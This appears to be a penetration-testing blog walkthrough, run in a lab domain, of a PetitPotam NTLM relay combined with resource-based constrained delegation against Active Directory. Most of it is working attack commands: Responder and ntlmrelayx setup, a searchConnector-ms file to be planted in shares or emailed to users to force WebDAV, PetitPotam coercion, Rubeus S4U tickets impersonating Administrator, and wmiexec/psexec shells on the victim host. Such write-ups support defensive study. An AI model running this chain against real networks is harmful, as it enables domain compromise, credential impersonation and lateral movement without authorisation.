Coercing elevated accounts such as machine accounts to authenticate to a host under the control of an attacker can provide an opportunity for privilege escalation and domain escalation. There are various examples which involve the Print Spooler service, the PetitPotam attack or the lock screen of Windows that trigger machine accounts to authenticate with another system and relay this authentication on the domain controller.

The PetitPotam attack enables a threat actor which has established access on the organization network to compromise the domain. However, this attack could be combined with resource based constrained delegation in order to gain elevated access to other systems on the network which are running the WebDav service as a lateral movement option.

The configuration of Responder should be modified to disable the HTTP service to avoid conflict with the ntlmrelayx tool which is going to capture HTTP authentication. Executing the following will open the configuration file of Responder.

sudo vi /usr/share/responder/Responder.conf 
Responder – Disable HTTP Service

Execution of Responder is required in order to generate the Windows machine name that could be used at a later stage during the execution of the PetitPotam attack. WebDav clients can pass authentication automatically to a netbios name and not to an IP address. Therefore the attack will not work if an IP address is used.

sudo responder -I eth0
Responder

In this instance the Responser Machine Name was: “WIN-UBNW4FI3AP0“.

Responder Machine Name

The ntlmrelayx tool from Impacket suite can perform automatically resource based constrained delegation attacks with the “–delegate-access” flag. The target host will be the domain controller and authentication will be relayed via the LDAP protocol.

python3 ntlmrelayx.py -t ldaps://dc --delegate-access -smb2support
ntlmrelayx – Resource Based Constrained Delegation

The GetWebDAVStatus tool can be executed from an implant via execute-assembly (Cobalt Strike, Metasploit etc.) in order to identify systems which are running the WebClient service and therefore could be used for lateral movement. The tool was developed by Dave Cossa and uses the named pipe “DAV RPC SERVICE” to determine the hosts which are running the service.

GetWebDAVStatus.exe 10.0.0.4
WebDavStatus – Remote

Alternatively, the “webclientservicescanner” python tool can be used from a non domain joined system against a network range. However, valid domain credentials are required.

webclientservicescanner purple.lab/pentestlab:Password1234@10.0.0.1-10.0.0.9
webclientservicescanner

In the event that no clients are running the web client service can be enabled remotely by using “searchConnector-ms” files as described by David Middlehurst in his article about search connectors and library files. The following is a schema example file which was presented in the article and can be planted in an SMB share or delivered via email towards a number of users to coerce the service to start.

<?xml version="1.0" encoding="UTF-8"?>
<searchConnectorDescription xmlns="http://schemas.microsoft.com/windows/2009/searchConnector">
    <iconReference>imageres.dll,-1002</iconReference>
    <description>Microsoft Outlook</description>
    <isSearchOnlyItem>false</isSearchOnlyItem>
    <includeInStartMenuScope>true</includeInStartMenuScope>
    <iconReference>https://w.dtm.uk/0001.ico</iconReference>
    <templateInfo>
        <folderType>{91475FE5-586B-4EBA-8D75-D17434B8CDF6}</folderType>
    </templateInfo>
    <simpleLocation>
        <url>https://w.dtm.uk/</url>
    </simpleLocation>
</searchConnectorDescription>

From the results above two hosts can be used for lateral movement. (10.0.0.4 and 10.0.0.9). Executing the PetitPotam exploit using the Windows machine name from Responder and the host which is running the WebClient service will force the machine account of the target IP address to authenticate with the system which is configured to receive that authentication.

PetitPotam.exe WIN-UBNW4FI3AP0@80/pentestlab 10.0.0.4
PetitPotam

The machine account of the target host (PC1$) will authenticate with the domain controller via LDAP connection. Since the flag “–delegate-access” has been used during execution of ntlmrelayx a new computer account will be created on the domain with delegation permissions over the host PC1 (10.0.0.4).

Resource Based Constrained Delegation – Remote Computer Object

The new computer account will be visible into the Active Directory object “Computers“.

Active Directory – New Computer Object

The PC1$ machine account will have some permissions over the new computer account.

Active Directory – New Computer Object Permissions

The attribute “msDS-AllowedToActOnBehalfOfOtherIdentity” of the PC1 (10.0.0.4) host has been modified and therefore the new machine account (WVLFLLKZ) has delegation permissions.

Attribute – msDS-AllowedToActOnBehalfOfOtherIdentity

The methodology of Resource Based Constrained Delegation is now applicable and could be used to establish an elevated session. Execution of the following command will calculate the hash values of the new machine account password.

.\Rubeus.exe hash /domain:purple.lab /user:WVLFLLKZ$ /password:'iUAL)l<i$;UzD7W'
Rubeus – Calculate Password Hash

Rubeus support the service for user (S4U) kerberos extension and can be used to request a service ticket for the CIFS service of the target host on behalf of the Administrator account. The initial ticket request will correspond to the machine account.

.\Rubeus.exe s4u /user:WVLFLLKZ$ /aes256:E0B3D87B512C218D38FAFDBD8A2EC55C83044FD24B6D740140C329F248992D8F /impersonateuser:Administrator /msdsspn:host/pc1.purple.lab /altservice:cifs /nowrap /ptt
Rubeus – Request TGT Machine Account

The second request for a ticket will correspond to the Administrator account.

Rubeus – Administrator Ticket

The final ticket will be requested on behalf of the administrator account using the Kerberos extension service for user proxy (S4U2proxy). The ticket will be for the service common internet file system (CIFS) and could be used to get direct access on the host via SMB or WMI protocols.

Rubeus – CIFS Ticket

Executing “klist” will confirm that the ticket is cached into the current session.

klist
List Caches Kerberos Ticket

Since the ticket is cached the contents of the C: drive of the target computer can be displayed using the command below:

ls \\PC1.purple.lab\c$
Access Share

The ticket will be exported from Rubeus as based64 encoded. The following command will decode the ticket and write the output in a file with the .kirbi extension.

echo "<base64>" | base64 -d > admin.kirbi
Convert Ticket to kirbi

The kirbi ticket can be converted to .ccache format with “ticketConverter” utility. Tools that support Kerberos authentication can make use of the ticket for connection via the environmental variable “KRB5CCNAME“.

ticketConverter.py /home/kali/admin.kirbi admin.ccache
export KRB5CCNAME=admin.ccache
Convert Kerberos Ticket

The “wmiexec” utility from Impacket suite can be utilized from the same console to establish access with the target host as an administrator user using Kerberos authentication.

wmiexec.py -k -no-pass purple.lab/administrator@pc1.purple.lab
wmiexec – Kerberos Authentication

Alternatively, a connection can be established using the “psexec” utility.

python3 psexec.py -k -no-pass purple.lab/administrator@pc1.purple.lab
psexec – Kerberos Authentication

References

1 Comment

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s